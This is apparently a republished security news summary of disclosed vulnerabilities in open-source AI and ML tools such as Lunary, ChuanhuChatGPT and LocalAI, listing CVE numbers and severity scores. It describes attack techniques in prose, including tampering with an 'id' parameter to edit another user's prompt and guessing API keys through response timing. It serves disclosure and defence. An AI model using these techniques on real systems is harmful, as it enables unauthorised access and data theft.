Researchers Identify Vulnerabilities in Open-Source AI and ML Models

Researchers Identify Vulnerabilities in Open-Source AI and ML Models

Over three dozen security vulnerabilities have been found in various open-source AI and ML models, with some capable of enabling remote code execution and data theft. These flaws, discovered in tools such as ChuanhuChatGPT, Lunary, and LocalAI, were reported via Protect AI’s Huntr bug bounty platform.

The most severe of the flaws are two shortcomings impacting Lunary, a production toolkit for large language models (LLMs) -

  • CVE-2024-7474 (CVSS score: 9.1) - An Insecure Direct Object Reference (IDOR) vulnerability that could allow an authenticated user to view or delete external users, resulting in unauthorized data access and potential data loss
  • CVE-2024-7475 (CVSS score: 9.1) - An improper access control vulnerability that allows an attacker to update the SAML configuration, thereby making it possible to log in as an unauthorized user and access sensitive information

Protect AI detailed an attack scenario where an attacker logs in as User A and intercepts a prompt update request. By altering the 'id' parameter to match a prompt belonging to User B, the attacker can modify User B's prompt without authorization.

Another critical vulnerability (CVE-2024-5982, CVSS 9.1) involves a path traversal issue in ChuanhuChatGPT’s upload feature, which could lead to arbitrary code execution, unauthorized directory creation, and exposure of sensitive data.

LocalAI, an open-source platform for running self-hosted LLMs, also faces two vulnerabilities. One (CVE-2024-6983, CVSS 8.8) could allow arbitrary code execution through a malicious configuration file, while another (CVE-2024-7010, CVSS 7.5) enables API key guessing via response time analysis, allowing an attacker to deduce a valid key one character at a time, as described by Protect AI.

Additionally, a remote code execution vulnerability in the Deep Java Library (DJL) (CVE-2024-8396, CVSS 7.8) is linked to an arbitrary file overwrite issue within its untar function.

The disclosure comes shortly after NVIDIA released patches for a path traversal vulnerability in its NeMo generative AI framework (CVE-2024-0129, CVSS 6.3), which could result in code execution and data tampering.

For Further Reference

https://thehackernews.com/2024/10/researchers-uncover-vulnerabilities-in.html

要查看或添加评论,请登录

KairoSols的更多文章

社区洞察